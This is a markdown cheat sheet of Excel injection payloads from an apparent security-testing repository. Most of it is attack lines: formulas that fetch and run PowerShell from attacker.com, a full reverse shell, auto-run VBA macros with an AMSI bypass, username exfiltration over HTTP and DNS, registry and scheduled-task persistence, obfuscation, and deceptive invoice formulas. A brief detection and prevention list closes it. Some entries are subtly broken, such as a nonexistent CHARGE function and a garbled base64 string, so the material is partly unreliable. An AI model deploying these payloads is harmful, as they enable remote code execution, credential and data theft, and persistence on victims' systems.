# Excel Injection > Comprehensive collection of Excel injection techniques, payloads, and attack vectors for security testing and penetration testing. ## 📋 Overview Excel injection encompasses various attack vectors that leverage Excel features to execute arbitrary code, exfiltrate data, or perform malicious actions when users open or interact with Excel files. ## 🎯 Summary * [Basic Formula Injection](#basic-formula-injection) * [Dynamic Data Exchange (DDE) Attacks](#dynamic-data-exchange-dde-attacks) * [Excel Macro Injection](#excel-macro-injection) * [Excel Power Query Injection](https://mahbubzulkarnain.gitbook.io/catatan-seekor-the-series/security/payloads-all-the-things/excel-injection/excel-power-query-injection) * [Excel External Link Injection](https://mahbubzulkarnain.gitbook.io/catatan-seekor-the-series/security/payloads-all-the-things/excel-injection/excel-external-link-injection) * [Excel Injection Examples - Step by Step](https://mahbubzulkarnain.gitbook.io/catatan-seekor-the-series/security/payloads-all-the-things/excel-injection/excel-injection-examples) * [Testing Lab Setup Guide](https://mahbubzulkarnain.gitbook.io/catatan-seekor-the-series/security/payloads-all-the-things/excel-injection/testing-lab-setup) * [Payload Examples](https://github.com/mahbubzulkarnain/catatan-seekor-the-series/blob/master/security/payloads-all-the-things/excel-injection/Payloads/README.md) * [Tools and Utilities](https://github.com/mahbubzulkarnain/catatan-seekor-the-series/blob/master/security/payloads-all-the-things/excel-injection/Tools/README.md) ## 🎯 Quick Start **New to Excel Injection? Start here:** 1. [**Theory & Basics**](#overview) → Understand fundamental concepts 2. [**Step-by-Step Examples**](https://mahbubzulkarnain.gitbook.io/catatan-seekor-the-series/security/payloads-all-the-things/excel-injection/excel-injection-examples) → Practical hands-on learning 3. [**Testing Lab Setup**](https://mahbubzulkarnain.gitbook.io/catatan-seekor-the-series/security/payloads-all-the-things/excel-injection/testing-lab-setup) → Create safe practice environment 4. [**Payload Generator**](https://github.com/mahbubzulkarnain/catatan-seekor-the-series/blob/master/security/payloads-all-the-things/excel-injection/Tools/excel-payload-generator.py) → Generate custom payloads **Experienced User? Jump to:** * [**Advanced Techniques**](https://mahbubzulkarnain.gitbook.io/catatan-seekor-the-series/security/payloads-all-the-things/excel-injection/excel-power-query-injection) → Power Query & M code attacks * [**Payload Library**](https://github.com/mahbubzulkarnain/catatan-seekor-the-series/blob/master/security/payloads-all-the-things/excel-injection/Payloads/basic-excel-injections.csv) → 200+ ready payloads * [**Lab Configuration**](https://mahbubzulkarnain.gitbook.io/catatan-seekor-the-series/security/payloads-all-the-things/excel-injection/testing-lab-setup) → Professional testing setup ## 🚀 Basic Formula Injection ### Formula Triggers Excel formulas can be triggered with these characters: ```excel = Equals + Plus - Minus @ At sign (Excel 2016+) ``` ### Basic Command Execution #### Windows Command Execution ```excel =cmd|'/C calc.exe'!A1 =cmd|'/C powershell -Command "Start-Process calc"'!A1 =HYPERLINK("cmd|'/C calc.exe'!A1","Click me") ``` #### PowerShell Download and Execute ```excel =cmd|'/C powershell IEX(New-Object Net.WebClient).DownloadString("http://attacker.com/payload.ps1")'!A1 =cmd|'/C powershell -W hidden -Command "&([scriptblock]::Create((New-Object Net.WebClient).DownloadString(\"http://attacker.com/payload.ps1\"))).Invoke()"'!A1 ``` #### Reverse Shell ```excel =cmd|'/C powershell -c "$client = New-Object System.Net.Sockets.TCPClient(\"192.168.1.100\",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \"PS \" + (pwd).Path + \"> \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"'!A1 ``` ## 🔥 Dynamic Data Exchange (DDE) Attacks ### Basic DDE Payloads ```excel DDE ("cmd";"/C calc";"!A0")A0 @SUM(1+1)*cmd|' /C calc'!A0 =2+5+cmd|' /C calc'!A0 =cmd|' /C calc'!'A1' ``` ### Advanced DDE Attacks ```excel =cmd|'/C powershell -Command "IEX (New-Object Net.WebClient).DownloadString(\"http://attacker.com/dde.ps1\")"'!A0 =cmd|'/C rundll32.exe url.dll,OpenURL calc.exe'!A0 =cmd|'/C mshta.exe http://attacker.com/payload.hta'!A0 ``` ### DDE Obfuscation ```excel =AAAA+BBBB-CCCC&"Hello"/12345&cmd|'/c calc.exe'!A =cmd|'/c calc.exe'!A*cmd|'/c calc.exe'!A = cmd|'/c calc.exe'!A =SUBSTITUTE(SUBSTITUTE("=cmd|'/c calc'!A1","=",""),"'","") ``` ## 📝 Excel Macro Injection ### VBA Macro Payloads #### Auto-Execute on Open ```vba Private Sub Workbook_Open() Shell "cmd.exe /c calc.exe", vbHide End Sub Private Sub Document_Open() CreateObject("WScript.Shell").Run "powershell.exe -WindowStyle Hidden -Command IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')" End Sub ``` #### Advanced Macro with AMSI Bypass ```vba Private Sub Workbook_Open() On Error Resume Next ' AMSI Bypass Dim amsiPtr As LongPtr amsiPtr = GetProcAddress(LoadLibraryA("amsi.dll"), "AmsiScanBuffer") If amsiPtr <> 0 Then Dim patch As String patch = "B8" & String(16, "00") & "C3" Call WriteProcessMemory(GetCurrentProcess(), amsiPtr, StrPtr(patch), Len(patch), 0) End If ' Execute payload Dim ps As Object Set ps = CreateObject("WScript.Shell") ps.Run "powershell.exe -WindowStyle Hidden -Command IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/amsi-bypass.ps1')", 0 End Sub ``` ### XLM Macro (Excel 4.0) ```excel =ALERT("This workbook contains macros",3) =EXEC("cmd.exe /c calc.exe") =CALL("Kernel32","WinExec","JJCC","calc.exe",0) =HALT() ``` ## 🛡️ Evasion Techniques ### Character Obfuscation ```excel =CHARGE(67,68,109,100,124,39,47,67,32,99,97,108,99,39,33,65,49) =CONCATENATE("c","m","d","|","'","/","C"," ","c","a","l","c","'","!","A","1") =SUBSTITUTE(SUBSTITUTE("=cmd|'/C calc'!A1","=",""),"'","") ``` ### Function-Based Obfuscation ```excel =INDIRECT("cmd|'/C calc'!A1") =EVALUATE("cmd|'/C calc'!A1") =FORMULATEXT("=cmd|'/C calc'!A1") ``` ### Encoding Techniques ```excel =cmd|'/C echo Y21kIC9DIGFkZCB1c2VyIGhhY2tlciAvYWRkICJhZG1pbiI= | base64 /d | cmd'!A1 =cmd|'/C powershell -Command "$text = \"Y21kIC9DIGFscHJvZHVjdCBjYWxj\"; $bytes = [Convert]::FromBase64String($text); [System.Text.Encoding]::ASCII.GetString($bytes) | iex"'!A1 ``` ## 🌐 Network-Based Attacks ### HTTP Request Payloads ```excel =cmd|'/C curl http://attacker.com/excel-injection?data=%USERNAME%'!A1 =cmd|'/C powershell -Command "Invoke-WebRequest -Uri http://attacker.com/collect -Method POST -Body @{data=$env:USERNAME}"'!A1 =WEBSERVICE("http://attacker.com/excel-injection?data="&A1) ``` ### DNS Exfiltration ```excel =cmd|'/C nslookup %USERNAME%.attacker.com'!A1 =cmd|'/C powershell -Command "nslookup \"$env:USERNAME.$env:COMPUTERNAME.attacker.com\""'!A1 ``` ## 📱 Platform-Specific Attacks ### Windows-Specific ```excel =cmd|'/C reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v \"Payload\" /t REG_SZ /d \"cmd.exe /c calc.exe\"'!A1 =cmd|'/C schtasks /create /tn \"ExcelPayload\" /tr \"calc.exe\" /sc onlogon'!A1 =cmd|'/C powershell -Command \"Register-ScheduledTask -TaskName ExcelPayload -Action (New-ScheduledTaskAction -Execute calc.exe) -Trigger (New-ScheduledTaskTrigger -AtLogon)\"'!A1 ``` ### macOS-Specific (Excel for Mac) ```excel =APPLESCRIPT("do shell script \"osascript -e 'tell application \"System Events\" to keystroke \"calc\" using command down'") =APPLESCRIPT("do shell script \"curl http://attacker.com/mac-payload.sh | bash\"") ``` ## 🎨 Social Engineering Attacks ### Malicious Hyperlinks ```excel =HYPERLINK("cmd|'/C calc.exe'!A1","Click here for important information") =HYPERLINK("http://attacker.com/phishing.html","Login to your account") =HYPERLINK("javascript:alert('XSS')","Click me") ``` ### Deceptive Formulas ```excel ="Total: $1000 "&cmd|'/C calc.exe'!A1 ="Invoice ID: INV-2024-"&cmd|'/C powershell IEX(New-Object Net.WebClient).DownloadString(\"http://attacker.com/payload.ps1\")'!A1 ``` ## 🔍 Detection and Prevention ### Detection Signs * Unexpected formula execution * DDE warnings from Excel * Suspicious macro content * Network connections from Excel processes * Unusual child processes from Excel ### Prevention Measures 1. **Enable Protected View** in Excel 2. **Disable Macros** by default 3. **Block DDE functionality** via Group Policy 4. **Use Application Control** to block Excel spawning suspicious processes 5. **Network Monitoring** for unusual Excel traffic 6. **File Sandboxing** before opening ## 📚 References * [Microsoft Security Advisory - DDE](https://msrc.microsoft.com/advisory) * [OWASP - CSV Injection](https://owasp.org/www-community/attacks/CSV_Injection) * [BlackHat - Excel Macro Attacks](https://www.blackhat.com/presentations) * [SANS - Excel Security](https://www.sans.org/white-papers/) ## 🛠️ Related Tools * [Excel Payload Generator](https://github.com/mahbubzulkarnain/catatan-seekor-the-series/blob/master/security/payloads-all-the-things/excel-injection/Tools/excel-payload-generator.py) - Comprehensive payload generation tool * [Basic Payload Examples](https://github.com/mahbubzulkarnain/catatan-seekor-the-series/blob/master/security/payloads-all-the-things/excel-injection/Payloads/basic-excel-injections.csv) - Ready-to-use injection payloads * [Step-by-Step Examples](https://mahbubzulkarnain.gitbook.io/catatan-seekor-the-series/security/payloads-all-the-things/excel-injection/excel-injection-examples) - 8 complete practical scenarios * [Testing Lab Setup](https://mahbubzulkarnain.gitbook.io/catatan-seekor-the-series/security/payloads-all-the-things/excel-injection/testing-lab-setup) - Complete virtual lab configuration *** *⚠️ This documentation is for educational purposes and authorized security testing only. Always obtain proper authorization before testing.*